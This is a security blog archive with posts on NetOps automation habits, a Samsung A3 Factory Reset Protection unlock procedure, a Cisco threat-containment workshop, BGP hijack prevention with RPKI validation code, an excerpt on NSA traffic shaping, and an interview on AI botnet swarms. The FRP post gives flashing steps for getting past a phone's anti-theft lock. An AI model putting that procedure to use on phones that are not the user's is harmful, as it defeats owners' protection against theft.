Showing posts with label Security. Show all posts

Wednesday, July 3, 2019

Mistakes when adopting DevOps for production network automation

If that sounds a lot like “DevOps is coming to a network near you” then you have perfect pitch, because that’s exactly what’s going on inside enterprises around the globe.

We already have plenty of evidence, empirical and anecdotal, to indicate that use of automation and orchestration in production environments is not an anomaly. In fact, it appears to be accelerating as NetOps teams try to catch up to their DevOps counterparts.

The pressure to reach automated parity with app development environments can lead to skipping the strategy and going right for the tactical approach to adopting a more agile, automated means of making changes to the production pipeline.

That’s not a good thing. Production is not development, and the blast radius is significantly larger in production where there are hundreds -- sometimes thousands -- of applications and business processes relying on shared networking services. You can’t fail fast enough to avoid incurring damages when something goes wrong.

So as automation and orchestration become the norm in production environments, NetOps teams should be mindful of which DevOps practices they embrace and which they don’t. Because when bad habits are really hard to break, the best option is simply to avoid forming them in the first place.
To help you out, here are the top three bad habits you should avoid when adopting DevOps for production network automation and orchestration:

 3 Bad Habits NetOps Should Avoid

 1. Skipping the code review
The State of Code Review 2017 from SmartBear, a supplier of software-quality tools for teams, notes that 74% of developers participate in code reviews. That sounds good, until you realize that means the other 26% aren’t. Unsurprisingly, the No. 1 reason cited for not reviewing code at desired levels is workload.
This is how defects and bugs (excuse me, "undocumented features") creep into software. These are logic and security-based mistakes that can lead to crashes, outages, memory leaks, and even breaches. When you’re writing scripts, and integrating multiple services to automate and orchestrate a process, you are writing code. And if you are writing code, it needs to be reviewed by someone other than you.
Remember, this isn’t testing or QA where you can mess up and it doesn’t impact the business’ bottom line. This will be production, and a single mistake can lead to all sorts of problems. Make the time to conduct code reviews. The benefits are well-documented and include:
  • increased quality of code with higher chance of identifying and eliminating security flaws
  • knowledge sharing -- others learn the process along with the code
  • compliance (ISO 9000/9001)
2. Ignoring maintainability
     According to a 2016 survey conducted by Software Improvement Group and O’Reilly, 70% of respondents "believe that maintainability is the most important aspect of code to measure, even as compared to performance or security."
I hate PERL, and I’m not all that fond of Python. So I’m going to use node.js instead. Or maybe I’m just going to craft some incomprehensible command-line magic with sed, awk, and my friend grep to push this change to that router. Problem is, no one else uses node.js and that command line relies on my system-specific configuration.

     That is not maintainable, and using “whatever language/tool/system” you want to build scripts and services to automate networking makes embracing code reviews really, really hard. It won’t go well for you. If no one else can maintain that code, it becomes yours. For life.

     It’s like the goldfish you begged for when you were eight and now you’re stuck with it.
Standardizing on languages, tools, and systems early is important.

3. Ignoring security Rule Zero
     Every AD&D (Dungeons and Dragons) player, at least all the ones I play with, know about Rule Zero: “The Dungeon Master is the final arbiter of all rule decisions.” It supersedes all other rules in the game, hence the reason it is numbered as zero. In security, we also have a rule zero: “Thou shalt never trust user input. Ever.”

A number of high-profile outages were caused by ignoring this rule, because command-line parameters passed to any script are, by default, user input. Ignoring this rule may trigger a resume-generating event by accidentally causing an outage of extreme proportions.

Never trust user input implicitly.

     Whether that’s the IP address of a wiring closet switch or a variable passed to inform a firewall script which port to open or close, don’t blindly execute on it. Instead, always validate input and, if necessary, force the human invoker of the script to verify the input. After all, they might not have meant to push that configuration change to every switch.
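Here is what "validate input and force the invoker to verify it" looks like for a firewall/switch change script. This is an added example, not code from the original post: the inventory, the management range, the confirmation threshold and the "push" step (which here only describes the change) are constructed stand-ins for your own source of truth and vendor API.

```python
"""Validate the inputs of a network-change script before acting on them.

Added example for the "Rule Zero" point above; not code from the original post.
INVENTORY, MGMT_NET and the push step are constructed stand-ins.
"""
import ipaddress
import re
import sys

# Constructed inventory: management IP -> device role.
INVENTORY = {
    "10.10.1.11": "closet-switch",
    "10.10.1.12": "closet-switch",
    "10.10.1.13": "closet-switch",
    "10.10.0.1": "core-firewall",
}
MGMT_NET = ipaddress.ip_network("10.10.0.0/16")  # assumed management range
ALLOWED_ACTIONS = {"open", "close"}
CONFIRM_THRESHOLD = 1  # touching more devices than this needs a human "yes"


class InvalidInput(ValueError):
    """Raised for any argument we refuse to act on."""


class ConfirmationRequired(RuntimeError):
    """Raised when a plan is wide enough to need explicit confirmation."""


def parse_target(value):
    """Resolve 'all', one management IP, or a CIDR to inventory devices.

    Hostnames, shell metacharacters and addresses outside the management
    range are rejected instead of being passed on to a device.
    """
    if value == "all":
        return sorted(INVENTORY)
    try:
        net = ipaddress.ip_network(value, strict=False)
    except ValueError:
        raise InvalidInput(f"not an IP address or CIDR: {value!r}") from None
    if net.version != MGMT_NET.version or not net.subnet_of(MGMT_NET):
        raise InvalidInput(f"{value} is outside the management range {MGMT_NET}")
    targets = sorted(ip for ip in INVENTORY if ipaddress.ip_address(ip) in net)
    if not targets:
        raise InvalidInput(f"no inventory device matches {value}")
    return targets


def parse_port(value):
    """Accept only a decimal port number in 1..65535."""
    if not re.fullmatch(r"[0-9]{1,5}", value):
        raise InvalidInput(f"not a port number: {value!r}")
    port = int(value)
    if not 1 <= port <= 65535:
        raise InvalidInput(f"port out of range: {port}")
    return port


def parse_action(value):
    if value not in ALLOWED_ACTIONS:
        raise InvalidInput(f"action must be one of {sorted(ALLOWED_ACTIONS)}")
    return value


def plan_change(target, port, action):
    """Validate all three arguments and describe what would be pushed."""
    targets = parse_target(target)
    return {
        "targets": targets,
        "port": parse_port(port),
        "action": parse_action(action),
        "needs_confirmation": len(targets) > CONFIRM_THRESHOLD,
    }


def apply_plan(plan, confirmed=False):
    """Return the per-device changes; refuse wide plans without confirmation.

    The real push is replaced by a description of each change.
    """
    if plan["needs_confirmation"] and not confirmed:
        raise ConfirmationRequired(
            f"plan touches {len(plan['targets'])} devices; confirm before pushing")
    return [f"{ip}: {plan['action']} tcp/{plan['port']}" for ip in plan["targets"]]


def main(argv):
    if len(argv) != 4:
        print(f"usage: {argv[0]} <ip|cidr|all> <port> <open|close>", file=sys.stderr)
        return 2
    try:
        plan = plan_change(argv[1], argv[2], argv[3])
    except InvalidInput as exc:
        print(f"refusing: {exc}", file=sys.stderr)
        return 2
    confirmed = False
    if plan["needs_confirmation"]:
        print("About to change:", ", ".join(plan["targets"]))
        confirmed = input("Type 'yes' to continue: ").strip() == "yes"
    try:
        for line in apply_plan(plan, confirmed):
            print(line)
    except ConfirmationRequired as exc:
        print(f"aborted: {exc}", file=sys.stderr)
        return 1
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The point is that every argument is parsed into a typed value against an allowlist (the inventory, the management range, the action set) before anything is sent to a device, and that "all" or a wide CIDR cannot be pushed by a script invoked in a loop without a human typing "yes".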
     As you proceed with efforts to automate IT in 2018, pay close attention to the habits you’re forming. Avoiding these three bad habits will go a long way toward ensuring a successful and productive year.

Sunday, May 19, 2019

Samsung A3 SM-A310F - FRP Cloud Lock

FRP unlock

1. Flash the service image (service firmware)
- Odin: load the image in the AP slot (called PDA in older Odin versions)
- boot the phone into Download Mode (blue screen: hold VolDown+Home+Power, release, then press VolUp to confirm)


2. Enable USB debugging on the phone
> Settings > Software info > tap Build number 10 times >> Developer options

3. Power phone off
-- boot into Download Mode again

4. Flash Stock ROM
-- Choose correct country + provider
-- https://www.updato.com

5. Enable OEM Unlock
-- Settings > Developer options > enable OEM unlocking (disables device security)

now you can flash TWRP and root your A3 .. or keep it in Stock and Encrypt it ;)

6. Flash TWRP Recovery image

Android 7.0+ on Samsung with ROOT -- disable encryption
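Before flashing TWRP it is worth confirming over adb that the OEM unlock toggle really took and whether userdata is still encrypted. The script below is an added example, not part of the original note. It assumes `adb` is on PATH and the phone is booted to Android with USB debugging enabled; the property names are standard Android system properties, but whether a given Samsung firmware exposes all of them is an assumption to check on the device.

```python
"""Check a Samsung phone's unlock and encryption state over adb before flashing.

Added example; not part of the original note. Assumes adb on PATH and USB
debugging enabled. Property names are standard Android props (assumed present).
"""
import subprocess

# Property -> meaning (assumed standard Android semantics).
PROPS = {
    "ro.product.model": "device model",
    "ro.build.version.release": "Android version",
    "sys.oem_unlock_allowed": "'OEM unlocking' toggle in Developer options (1 = on)",
    "ro.boot.flash.locked": "bootloader lock state reported at boot (1 = locked)",
    "ro.crypto.state": "userdata encryption state (encrypted/unencrypted)",
}

# Constructed sample of `adb shell getprop` output, used for offline testing.
SAMPLE_GETPROP = """[ro.product.model]: [SM-A310F]
[ro.build.version.release]: [7.0]
[sys.oem_unlock_allowed]: [1]
[ro.boot.flash.locked]: [0]
[ro.crypto.state]: [encrypted]
"""


def parse_getprop(output):
    """Parse getprop output, one `[key]: [value]` pair per line."""
    props = {}
    for line in output.splitlines():
        line = line.strip()
        if not (line.startswith("[") and "]: [" in line):
            continue
        key, _, value = line.partition("]: [")
        props[key[1:]] = value[:-1] if value.endswith("]") else value
    return props


def assess(props):
    """Decide whether flashing TWRP is safe; return blockers and warnings."""
    blockers, warnings = [], []
    if props.get("sys.oem_unlock_allowed") != "1":
        blockers.append("OEM unlocking is off: enable it under Developer options")
    if props.get("ro.boot.flash.locked") == "1":
        blockers.append("bootloader reports itself locked")
    if props.get("ro.crypto.state") == "encrypted":
        warnings.append("userdata is encrypted: on Android 7.0+ with root, "
                        "disable encryption first (see the note above)")
    return {"ready": not blockers, "blockers": blockers, "warnings": warnings}


def read_device_props():
    """Pull the property table from the connected phone (needs USB debugging)."""
    out = subprocess.run(["adb", "shell", "getprop"],
                         capture_output=True, text=True, check=True).stdout
    return parse_getprop(out)


if __name__ == "__main__":
    props = read_device_props()
    for key, meaning in PROPS.items():
        print(f"{key:28} {props.get(key, '<unset>'):14} {meaning}")
    result = assess(props)
    for msg in result["blockers"]:
        print("BLOCKER:", msg)
    for msg in result["warnings"]:
        print("warning:", msg)
    print("ready to flash TWRP" if result["ready"] else "not ready")
```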





Thursday, March 7, 2019

Cisco DevNet Express Security 2019, Prague


** Cisco DevNet Express ** Prague - 5-6.3.2019

  • We created a simple automated workflow, using different APIs.
  • We identified the rogue endpoints where malware had executed in our network using AMP for Endpoints.
  • We used ISE to quarantine these endpoints to contain the known threats.
  • We used the AMP data to collect intelligence on the SHAs using Threat Grid.
  • We derived the IP and domain list associated with these SHAs from Threat Grid.
  • We used Umbrella Investigate to gather intelligence on the domains/IPs.
  • We used Umbrella Enforcement to contain the threat and prevent the malware from executing, as it can't call home.
  • We used Firepower FDM APIs to enforce and contain the threat on the next-gen firewalls.
  • We used the Python programming language to call the different APIs.
  • We used Python to pull and push data between different security systems, creating one.
  • We used Python to parse JSON, XML and YAML and to call REST APIs.
  • We learned how to gather the intelligence and use it to quickly contain the threat and protect the rest of the network.
  • DevOps is already needed in the security business and is coming fast to networking as well.
By the end of the second day we had multiple missions, created by Cisco, in which to apply the knowledge gathered above.
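The glue between those steps is mostly data transformation: pull detections out of AMP's event JSON, deduplicate SHAs and hosts, then build the request bodies that ISE (ANC quarantine) and Umbrella (Enforcement API) accept. The script below is an added example of that glue and is not the workshop's code. The AMP events are constructed in the shape of the AMP for Endpoints v1 events API, the Threat Grid domain list is a constructed stand-in for what Threat Grid returned, and the ISE ANC and Umbrella Enforcement bodies follow those APIs as the author of this example understands them: verify the field names against current documentation before posting them (the HTTP calls themselves, via `requests`, are left out).

```python
"""Turn AMP "Threat Detected" events into ISE ANC and Umbrella Enforcement payloads.

Added example, not Cisco's workshop code. Sample events, Threat Grid output and
request-body field names are constructed/assumed; verify against current docs.
"""
from collections import defaultdict
from datetime import datetime, timezone

# Constructed AMP events (hashes are placeholders, not real malware hashes).
SHA_A, SHA_B = "a" * 64, "b" * 64
AMP_EVENTS = {"data": [
    {"event_type": "Threat Detected",
     "computer": {"hostname": "WS-01", "connector_guid": "guid-01",
                  "network_addresses": [{"ip": "10.0.5.21", "mac": "00:11:22:33:44:55"}]},
     "file": {"disposition": "Malicious", "identity": {"sha256": SHA_A}}},
    {"event_type": "Threat Detected",
     "computer": {"hostname": "WS-02", "connector_guid": "guid-02",
                  "network_addresses": [{"ip": "10.0.5.22", "mac": "00:11:22:33:44:66"}]},
     "file": {"disposition": "Malicious", "identity": {"sha256": SHA_A}}},
    {"event_type": "Scan Completed",  # not a detection: ignored
     "computer": {"hostname": "WS-03", "connector_guid": "guid-03",
                  "network_addresses": [{"ip": "10.0.5.23", "mac": "00:11:22:33:44:77"}]}},
    {"event_type": "Threat Detected",
     "computer": {"hostname": "WS-01", "connector_guid": "guid-01",
                  "network_addresses": [{"ip": "10.0.5.21", "mac": "00:11:22:33:44:55"}]},
     "file": {"disposition": "Malicious", "identity": {"sha256": SHA_B}}},
]}

# Constructed stand-in for the domains Threat Grid reported per SHA256.
THREAT_GRID_DOMAINS = {SHA_A: ["c2.example.net", "drop.example.org"],
                       SHA_B: ["c2.example.net"]}


def extract_detections(events):
    """Map each malicious SHA256 to the endpoints it executed on."""
    by_sha = defaultdict(dict)  # sha256 -> {connector_guid: (hostname, ip, mac)}
    for ev in events.get("data", []):
        if ev.get("event_type") != "Threat Detected":
            continue
        if ev.get("file", {}).get("disposition") != "Malicious":
            continue
        sha = ev["file"]["identity"]["sha256"]
        comp = ev["computer"]
        addr = comp["network_addresses"][0]
        by_sha[sha][comp["connector_guid"]] = (comp["hostname"], addr["ip"], addr["mac"])
    return dict(by_sha)


def ise_anc_bodies(detections, policy="Quarantine"):
    """One ANC 'apply' body per infected endpoint, keyed by MAC (deduplicated)."""
    macs = sorted({mac for hosts in detections.values() for _, _, mac in hosts.values()})
    return [{"OperationAdditionalData": {"additionalData": [
        {"name": "macAddress", "value": mac},
        {"name": "policyName", "value": policy}]}} for mac in macs]


def umbrella_events(detections, sha_to_domains, device_id="amp-workflow"):
    """One Enforcement event per domain so Umbrella blocks the call-home."""
    now = datetime.now(timezone.utc).isoformat(timespec="seconds")
    domains = sorted({d for sha in detections for d in sha_to_domains.get(sha, [])})
    return [{"alertTime": now, "eventTime": now, "deviceId": device_id,
             "deviceVersion": "1.0", "protocolVersion": "1.0a",
             "providerName": "Security Platform",
             "dstDomain": d, "dstUrl": f"http://{d}/"} for d in domains]


def containment_plan(events=AMP_EVENTS, sha_to_domains=THREAT_GRID_DOMAINS):
    """Everything the workflow would push, ready for the ISE and Umbrella calls."""
    detections = extract_detections(events)
    return {"shas": sorted(detections),
            "ise_anc": ise_anc_bodies(detections),
            "umbrella": umbrella_events(detections, sha_to_domains)}


if __name__ == "__main__":
    import json
    print(json.dumps(containment_plan(), indent=2))
```

Deduplicating by MAC and by domain matters in practice: the same host usually shows up in several AMP events, and pushing one ANC apply per event would hammer ISE for no gain.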


For one of the participants it was also a very happy day, as he gained not only knowledge but also a fully equipped Raspberry Pi 3B+!

It was my first reward gained from a CyberSecOps business :) And a fourth RPi into the collection :D

Saturday, December 8, 2018

BGP hijack prevention

https://www.manrs.org
---------------------------------
https://www.blackhat.com/presentations/bh-dc-09/Zmijewski/BlackHat-DC-09-Zmijewski-Defend-BGP-MITM.pdf
---------------------------------
all of the team members needed to be able to work creatively, independently and yet still in concert with each other, sometimes under circumstances of limited communications.
---------------------------------
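MANRS asks network operators to filter what they accept and announce; the mechanism that makes origin hijacks like the ones in the BlackHat talk detectable is RPKI route origin validation (RFC 6811). The script below is an added example of that comparison, not from the original post or from MANRS: the ROA table and the BGP updates are constructed, and a real deployment would feed validated ROA payloads from an RPKI validator into the router over RTR and let the router apply the same logic.

```python
"""Route Origin Validation (RFC 6811) against a local ROA table.

Added example for the BGP hijack prevention links above. ROAs and updates
are constructed; real routers get ROAs from an RPKI validator over RTR.
"""
import ipaddress
from collections import namedtuple

ROA = namedtuple("ROA", "prefix max_length asn")

# Constructed ROA table: who may originate what, and how specific it may be.
ROAS = [
    ROA(ipaddress.ip_network("192.0.2.0/24"), 24, 64496),
    ROA(ipaddress.ip_network("198.51.100.0/22"), 24, 64497),
    ROA(ipaddress.ip_network("2001:db8::/32"), 48, 64496),
    ROA(ipaddress.ip_network("203.0.113.0/24"), 24, 0),  # AS0 ROA: never announce
]


def rov_state(prefix, origin_asn, roas=ROAS):
    """Return 'valid', 'invalid' or 'notfound' for one (prefix, origin AS)."""
    prefix = ipaddress.ip_network(prefix, strict=False)
    covering = [r for r in roas
                if r.prefix.version == prefix.version and prefix.subnet_of(r.prefix)]
    if not covering:
        return "notfound"   # no ROA covers this prefix: RPKI says nothing
    for r in covering:
        if r.asn == origin_asn and prefix.prefixlen <= r.max_length:
            return "valid"  # an ROA authorises this origin at this length
    return "invalid"        # covered, but nothing authorises this announcement


def origin_as(as_path):
    """The origin is the last AS in the path (AS_PATH written left to right)."""
    return as_path[-1]


def filter_updates(updates, roas=ROAS):
    """Classify (prefix, as_path) updates and list the ones to drop.

    Policy used here: drop 'invalid', accept 'valid' and 'notfound' (most of
    the table is still unsigned, so rejecting 'notfound' would black-hole it).
    """
    results = []
    for prefix, as_path in updates:
        origin = origin_as(as_path)
        results.append({"prefix": prefix, "origin": origin,
                        "state": rov_state(prefix, origin, roas)})
    dropped = sorted((r["prefix"], r["origin"]) for r in results if r["state"] == "invalid")
    return results, dropped


# Constructed updates: legitimate, origin hijack, more-specific hijack,
# legitimate sub-allocation, unsigned prefix, AS0-protected prefix, IPv6.
UPDATES = [
    ("192.0.2.0/24", [64500, 64496]),      # valid
    ("192.0.2.0/24", [64500, 64666]),      # invalid: wrong origin
    ("192.0.2.0/25", [64500, 64496]),      # invalid: exceeds maxLength 24
    ("198.51.100.0/23", [64501, 64497]),   # valid: inside /22, length <= 24
    ("10.99.0.0/16", [64502, 64503]),      # notfound
    ("203.0.113.0/24", [64504, 64505]),    # invalid: AS0 ROA
    ("2001:db8:1::/48", [64500, 64496]),   # valid
]

if __name__ == "__main__":
    results, dropped = filter_updates(UPDATES)
    for r in results:
        print(f"{r['prefix']:18} origin AS{r['origin']:<6} {r['state']}")
    print("dropped:", dropped)
```

The two hijack cases are the ones ROV is designed for: a different origin AS announcing the exact prefix, and the legitimate origin's prefix re-announced as a more specific than the ROA's maxLength allows. Note that ROV says nothing about path manipulation (the MITM technique in the BlackHat slides keeps the real origin in the path), which is why MANRS also asks for path filtering and coordination.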

International detours and routing changes happen automatically, without human intervention. Even so, they offer an opportunity to the NSA. With some exceptions, the surveillance of raw Internet traffic from foreign points of interception can be conducted entirely under the authority of the president.

Congressional and judicial limitations come into play only when that raw Internet traffic is used to “intentionally target a U.S. person,” a legal notion that is narrowly interpreted to exclude bulk collection, storage, and even certain types of computerized data analysis.[8]
This is a crucial issue, because American data are routed across foreign communications cables. Several leading thinkers,[9] including Jennifer Granick in her recent report for The Century Foundation, have drawn attention to the creeping risk of domestic surveillance that is conducted from afar.
This report describes a novel and more disturbing set of risks. As a technical matter, the NSA does not have to wait for domestic communications to naturally turn up abroad.
In fact, the agency has technical methods that can be used to deliberately reroute Internet communications. The NSA uses the term “traffic shaping” to describe any technical means that deliberately reroutes Internet traffic to a location that is better suited, operationally, to surveillance.
Since it is hard to intercept Yemen’s international communications from inside Yemen itself, the agency might try to “shape” the traffic so that it passes through friendly communications cables located on friendlier territory.[10]

     Think of it as diverting part of a river to a location from which it is easier (or more legal) to catch fish.
     The NSA has clandestine means of diverting portions of the river of Internet traffic that travels on global communications cables.

If, for example, the Federal Bureau of Investigation (FBI) wants to monitor electronic communications between two Americans as part of a criminal investigation, it is required by law to obtain a warrant.[12]
If the intelligence community wants to intercept Americans’ communications inside the United States, for national security reasons, then it must follow rules established by the Foreign Intelligence Surveillance Act (FISA).[13]
Meanwhile, when the intelligence community wants to intercept traffic abroad, its surveillance is mostly regulated by Executive Order 12333 (EO 12333),[14] issued by Ronald Reagan in 1981.[15]
     Surveillance programs conducted under FISA are subject to oversight by the FISA Court and regular review by the intelligence committees in Congress.
Meanwhile, surveillance programs under EO 12333 are largely unchecked by either the legislative[16] or judicial branch. EO 12333 programs are conducted entirely under the authority of the president.

The narrow interpretation of “targeting” has significant implications for the privacy of U.S. persons. For instance, the NSA has built a “search engine”[44] that allows analysts to hunt through raw data collected in bulk through various means. If a human analyst uses that search engine to search for communications linked to a specific email address, Facebook username, or other personal identifier (a “selector”[45]), then that counts as “intentional targeting.”
However, if an analyst obtains information using search terms that do not implicate a single individual, for example words or phrases such as “Yemen” or “nuclear proliferation,” the communications swept up as part of this search, such as an email between two Americans discussing current events in Yemen, are not considered to be “intentionally targeted.”[46] Instead, these communications are merely “incidentally collected.”[47]
U.S. surveillance techniques are classified, which prevents outside observers from making categorical statements about how far the intelligence community stretches this notion of “incidental collection.”

     But how do communications between two Americans typically travel abroad?
    It can sometimes be faster or cheaper for Internet service providers (ISP) to send traffic through a foreign country. The United States has a well-connected communications infrastructure, so it is rare to find a case where traffic sent between two domestic computers naturally travels through a foreign country. 
     Nevertheless, these cases do occur. One such case (identified by Dyn Research’s Internet measurement infrastructure) is presented below
(Figure 1)
     The “traceroute” presented below shows how Internet traffic sent between two domestic computers travels through foreign territory. The traffic originates at a computer in San Jose and is routed through Frankfurt before arriving at its final destination in New York. The left column shows the Internet Protocol (IP) address of each Internet device on the route, the middle column names the Internet Service Provider (ISP) that owns this device, and the right column shows the location of the device.




Replicating U.S.-based data in foreign data centers is a common industry practice, in order to ensure that data can be recovered even in the face of local disasters (power outages, earthquakes, and so on).[53] Google, for instance, maintains data centers in the United States, Taiwan, Singapore, Chile, Ireland, the Netherlands, Finland, and Belgium, and its privacy policy states: “Google processes personal information on our servers in many countries around the world. We may process your personal information on a server located outside the country where you live.”[54] If two Americans use their Google accounts to communicate, their emails and chat logs may be backed up on Google’s data centers abroad, and thus can be “incidentally collected” as part of EO 12333 surveillance.

Traffic Shaping by “Port Mirroring” at Hacked Routers

It has been reported that the NSA already employs a technique to “shape” traffic so that it travels through a tapped communication cable. The traffic-shaping technique involves hacking into an Internet infrastructure device, for example a router. A router is a device that forwards Internet traffic to its destination.[73] In Figure 3, which was hand-drawn by a hacker employed by the NSA and later leaked, the hacked device[74] is called a “CNE midpoint.”[75]

“Electronic surveillance”
is a legal term that is defined in the FISA statute; in fact, despite several amendments, FISA’s definition of “electronic surveillance” remains largely unchanged from its original 1978 version. The FISA definition of “electronic surveillance” has two clauses that could potentially cover hacking into a U.S. router and instructing it to perform traffic shaping via port mirroring.
One clause in the FISA statute defines “electronic surveillance” to be
the installation or use of an electronic, mechanical, or other surveillance device in the United States for monitoring to acquire information, other than from a wire or radio communication, under circumstances in which a person has a reasonable expectation of privacy and a warrant would be required for law enforcement purposes.[81]
In other words, this clause covers the installation of a device in the United States for surveillance. Hacking a U.S. router could certainly be considered the installation of a device. However, a router is a “wireline” device, and this clause does not cover devices that acquire information from a “wire.”[82] As such, this clause is not relevant to the discussion.

Another clause in the FISA statute defines “electronic surveillance” as
the acquisition by an electronic, mechanical, or other surveillance device of the contents of any wire communication to or from a person in the United States, without the consent of any party thereto, if such acquisition occurs in the United States, but does not include the acquisition of those communications of computer trespassers that would be permissible under section 2511(2)(i) of title 18, United States Code.[83]

This clause covers the “acquisition” of communications inside the United States. However, one could argue that communications are not “acquired” when a U.S. router is hacked and instructed to perform port mirroring. The hacked router is merely instructed to copy traffic and pass it along, but not to read, store, or analyze it. Therefore, “acquisition” occurs at the tapped communication cable (abroad) rather than at the hacked router (inside the United States). As such, this clause is also not relevant.[84]


     The intelligence community does not have to hack into routers or use other clandestine techniques to shape traffic—it could simply ask the corporations that own those routers to provide access, or shape the traffic themselves. A document leaked by Edward Snowden suggests that the NSA has done this through its FAIRVIEW program.
(FAIRVIEW was revealed to be a code name for AT&T.[100]) The document states:
FAIRVIEW—Corp partner since 1985 with access to int[ernational] cables, routers, and switches. The partner operates in the U.S., but has access to information that transits the nation and through its corporate relationships provide unique access to other telecoms and ISPs. Aggressively involved in shaping traffic to run signals of interest past our monitors.[101]

     There is no evidence that the FAIRVIEW program is being used to shape traffic from inside the United States to foreign communications cables. But it is worth noting that, with the cooperation of corporations such as AT&T, traffic could easily be shaped to a collection point abroad without the need to hack into any routers, thus obviating many of the legal questions previously discussed.

Modern networking protocols and technologies can be manipulated in order to shape Internet traffic from inside the United States toward tapped communications cables located abroad. It is possible that traffic shaping is regulated by EO 12333, and not by FISA,[102] since the techniques shape traffic in bulk, in a way that does not “intentionally target” any specific individual or organization.
Moreover, while FISA covers the “acquisition” of Internet traffic on U.S. territory, the traffic shaping methods discussed merely move traffic around and do not read, store, analyze, or otherwise “acquire” it. Instead, acquisition is performed on foreign soil, at the tapped communication cable. Finally, while the Fourth Amendment may require a warrant for hacking U.S. routers, the warrant requirement could be avoided by performing traffic shaping with the consent of corporations that own the routers (e.g. via the FAIRVIEW program), or by hacking foreign routers (and then using BGP manipulations).

Technical Solutions Will Not Work

     One might be tempted to eliminate these loopholes via technical solutions. For instance, traffic shaping could be made more difficult by designing routers that are “unhackable,” and Internet protocols could be made secure against traffic-shaping manipulations. Or the confidentiality of traffic could be protected just by encrypting everything.
     While this approach sounds good in theory, in practice it is unlikely to work.
First, it is highly unlikely that we will ever have Internet infrastructure devices (e.g. routers) that cannot be hacked. Router software is complicated, and even the best attempt at an “unhackable” router is likely to contain bugs.[104] Intelligence agencies have dedicated resources to finding and using these bugs to hack into routers.[105] And even if we somehow manage to create bug-free router software, the intelligence community has been known to physically intercept routers as they ship in the mail, and tamper with their hardware.[106]

Second, it will take many years to develop and implement secure Internet protocols that prevent traffic shaping. A key challenge is that the Internet is a global system, one that transcends organizational and national boundaries. Deploying a secure Internet protocol requires cooperation from thousands of independent organizations in different nations. This is further complicated by the fact that many secure Internet protocols do not work well when they are used only by a small number of networks.[107]

Finally, while encryption can be used to hide the contents of Internet traffic, it does not hide metadata (that is, who is talking to whom, when they are talking, and for how long). Metadata is both incredibly revealing, and less protected by the law.[108] Intelligence agencies have also dedicated resources toward compromising encryption.[109] Moreover, EO 12333 allows the NSA to retain encrypted communications indefinitely.[110] This is significant because the technology used to break encryption tends to improve over time: a message that was encrypted in the past could be decryptable in the future, as technology improves.[111]
This is not to say that technical solutions are unimportant. On the contrary, they are crucial, especially because they protect Americans’ traffic from snoopers, criminals, foreign intelligence services, and other entities that do not obey American laws. Nevertheless, technologies evolve at a rapid pace, so solving the problem using technology would be a continuous struggle.

     It is much more sensible to realign the legal framework governing surveillance to encompass the technologies, capabilities, and practices of today and of the future.

Friday, November 30, 2018

AI and CDN used in Network Exploitation & Attacks (Pt.3)

Working together toward a common goal, attacking networks: that is the task of an intelligent botnet, able to share information on vulnerabilities and hosts and to change strategy quickly without a bot herder.

[https://threatpost.com/newsmaker-interview-derek-manky-on-self-organizing-botnet-swarms/136936/]

For over five years Derek Manky, global security strategist at Fortinet and FortiGuard Labs, has been helping the private and public sector identify and fight cybercrime. His job also includes working with noted groups: Computer Emergency Response, NATO NICP, INTERPOL Expert Working Group and the Cyber Threat Alliance.
Recently Threatpost caught up with Manky to discuss the latest developments around his research on botnet “swarm intelligence.” That’s a technique where criminals enlist artificial intelligence (AI) inside botnet nodes. Those nodes are then programmed to work toward a common goal of bolstering an attack chain and accelerating the time it takes to breach an organization.


Threatpost: What are “self-organized botnet swarms?”
Manky: What we are starting to see [are] humans, such as the black-hat hackers, being taken out of the attack cycle more and more. Why? Because humans are slow by nature compared to machines.
Swarms accelerate the attack chain – or attack cycle. They help attackers move fast. Over time, as defenses improve, the window of time for an attack is shrinking. This is a way for attackers to make up for that lost time.
A self-learning swarm is a cluster of compromised devices that leverage peer-based AI to target vulnerable systems. Traditional botnets wait for commands from a bot herder. Swarms are able to make decisions independently. They can identify and assault – or swarm – different attack vectors all at once.

TP: What type of botnets are we talking about here? Botnets used for crippling a network? Where is this technology seen today?
Manky: Hide and Seek is a recent botnet that we have seen with the swarm technology in it.

TP: So, what makes Hide and Seek unique?
Manky: Typically a botnet will receive a command from the attacker, right? They go DDoS the target or try to exfiltrate information. But what we are starting to see with these new peer-to-peer botnets is they are able to share those commands – between botnet nodes – and act on their own without an attacker issuing any commands.

TP:  Is this machine intelligence? And, what is it that these botnets are trying to learn from and execute?
Manky: They are collecting data. They are trying to learn information about potential attack targets – that is, exploits and weaknesses that they can launch a successful attack against. They are trying to pinpoint vulnerabilities or holes that they can actually go and launch a successful exploit against. They are looking for a penetration weakness – something they can send payload to. Once they find it, the node can let the rest of the botnet nodes know.

TP: Can you break this down into a likely scenario?
Manky: We’re starting to see this in the world of IoT. A hypothetical situation includes a network where there is a barrier – a network firewall, or policies. On the network is a printer, network attached storage, an IP security camera and a database. Then, for whatever reason, the IP security camera is on the same network segment as the database. Now [the attack] can target the printer and infect the network attached storage, which infects the camera. Now the camera can be used as a proxy to gather intelligence.
That intelligence is shared between the nodes. It’s a structured command list where it can say “send me a list of targets that you know, have this within the network segment – along with intelligence on that segment.” And then – when the network configurations match – the nodes can swarm and request the exfiltration of data and launch more attacks.

TP: Is there anything that is unique about the size or agility of these botnets? Does this “intelligence” allow it to be more efficient and smaller?
Manky: Swarms are large by nature. But I would call them first, efficient. Traditional botnets are monolithic. Bot-herders typically rent a botnet out just to [launch] a DDoS attack or just to launch a phishing attack. But with swarms, they have the capability to spin up resources – similar to virtual machines.
Bot-herders can say, “I want 20 percent of this botnet doing DDoS. I want 30 percent doing phishing campaigns.” It’s more about monetization, efficiency and being fast.

TP: When you say “swarms,” can you give me a sense of what you exactly mean by that?
Manky: The best example is what we see in nature – such as birds, bees and ants. When ants communicate they use pheromones between each other. The pheromones mark the shortest path to bring back food to the nest. Ants, in this scenario, aren’t taking orders from the queen ant. They are acting on their own.
Now the same concept is being applied to botnet code. What we are seeing are precursors of this right now. Hide and Seek has the code, but isn’t using it yet.
Hide and Seek is a decentralized IoT botnet. The capabilities are in the code, but we are still waiting for the first full-blown attack using this technique.
I expect to see a lot more of this technology in 2019.

TP:  Where does that leave us on the defense side of the equation?
Manky: It really needs to redefine the network security center. We are going to need more automated tools. It’s going to come down to AI versus AI. We need better security postures that are capable of actually detecting and acting on their own as well.
If you are up against a swarm, it’s very fast by nature. It can already breach a target, by the time a human administrator can detect it. For that reason, the network intelligence needs to be able to understand what it is seeing and be able to act on it.
At a higher level, it comes down to quality of intelligence and how much you trust your

